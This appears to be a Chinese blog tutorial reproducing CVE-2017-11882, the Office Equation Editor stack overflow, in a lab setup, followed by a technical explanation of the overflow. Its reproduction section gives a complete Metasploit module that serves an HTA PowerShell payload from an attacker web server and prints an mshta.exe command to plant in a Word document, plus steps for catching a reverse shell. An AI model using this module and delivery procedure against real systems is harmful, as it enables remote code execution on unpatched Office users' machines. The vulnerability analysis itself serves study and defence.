本文主要是介绍【漏洞复现】噩梦公式一代漏洞|公式编辑器EQNETD32.exe栈溢出漏洞(CVE-2017-11882),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
一、CVE-2017-11882 —— 类型:栈溢出漏洞
CVE-2017-11882 是 一 个Office 远程代码执行的漏洞,该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞。该漏洞位于EQNEDT32.EXE(Microsoft 公式编辑器),这个组件首发于 Microsoft Office2000 和 Microsoft2003, 用于在文档中插入和编辑方程式,EQNEDT32.EXE 在 17 年前编译后再未更改。虽然从 MicrosoftOffice2007 开始,显示和编辑方程的方法发生了变化,但是为了保持版本兼容性,EQNEDT32.EXE 并没有从 Office 套件中删除。盗个图如下:
二、准备
攻击机:kali-2019 192.168.75.146
靶机:win7_x86(关闭防火墙) 192.168.75.139
验证漏洞存在:
- 搭建漏洞环境(安装Office 2003 sp3),执行漏洞poc
- 由于漏洞出现在EQNEDT32.EXE 进程 首先需要确认是否存在公式编辑器
- 菜单->插入->对象 找到公式3.0
- 如果没有则说明Office安装不完全或者版本不符合
三、复现过程
1、下载 exp,生成漏洞验证文档 calc.doc
将 calc.doc 放到靶机中打开,弹出计算器说明漏洞存在
2、生成 payload 文档,发送到靶机
3、将下面内容保存成 PS_shell.rb 文件,并放到 msf 的脚本目录下,比如我新建了一个 wtf 目录,放在了这下面
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##class MetasploitModule < Msf::Exploit::RemoteRank = NormalRankinginclude Msf::Exploit::Remote::HttpServerdef initialize(info = {})super(update_info(info,'Name' => 'Microsoft Office Payload Delivery','Description' => %q{This module generates an command to place withina word document, that when executed, will retrieve a HTA payloadvia HTTP from an web server. Currently have not figured out howto generate a doc.},'License' => MSF_LICENSE,'Arch' => ARCH_X86,'Platform' => 'win','Targets' =>[['Automatic', {} ],],'DefaultTarget' => 0,))enddef on_request_uri(cli, _request)print_status("Delivering payload")p = regenerate_payload(cli)data = Msf::Util::EXE.to_executable_fmt(framework,ARCH_X86,'win',p.encoded,'hta-psh',{ :arch => ARCH_X86, :platform => 'win '})send_response(cli, data, 'Content-Type' => 'application/hta')enddef primerurl = get_uriprint_status("Place the following DDE in an MS document:")print_line("mshta.exe \"#{url}\"")end
end
4、启动 msf,执行 reload_all 从新加载一下攻击模块,可以多重复几遍,有时候卡的加载不粗来。PS_shell 加载成功后执行如下命令,准备接受反弹 shell
5、靶机打开 test.doc,攻击机 getshell
四、技术细节
该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出,是一个非常经典的栈溢出漏洞。
该漏洞出现在模块 EQNEDT32.EXE 中, 该模块为windows的公式编辑器。由于该模块对于输入的公式未做正确的处理,攻击者可以通过刻意构造的数据内容覆盖掉栈上的函数地址,从而劫持程序流程,执行任意命令:**模块路径:**C:\Program Files\Common Files\microsoft shared\EQUATION。
>> 通过ProcessMonitor 查看计算器的父进程,发现是 EQNEDT32.EXE,且 EQNEDT32.EXE 并不会作为 WINWORD 的子进程创建,而是以单独的形式存在。这就意味着 Office 的进程保护机制,无法阻止 EQNEDT32.EXE 这个进程被利用。因此 EQNEDT32.exe 就是出现漏洞的模块。
>> 那么如何定位到出现栈溢出漏洞的代码位置呢,因为弹出计算器的时候创建了新进程,所以我们可以认为是由 WinExec 或者 CreateProcess 创建的。用 windbg 附加 EQNEDT32.EXE,然后下 API 断点,再打开poc文件,观察断到哪里,找到调用公式编辑器的位置,再耐心找到strcpy函数即可,一般是没有用安全版本的 strcpy 函数导致的栈溢出漏洞。
参考:
https://blog.csdn.net/yiyiiyiy/article/details/78623873
https://blog.csdn.net/qq_38474570/article/details/98513146
这篇关于【漏洞复现】噩梦公式一代漏洞|公式编辑器EQNETD32.exe栈溢出漏洞(CVE-2017-11882)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
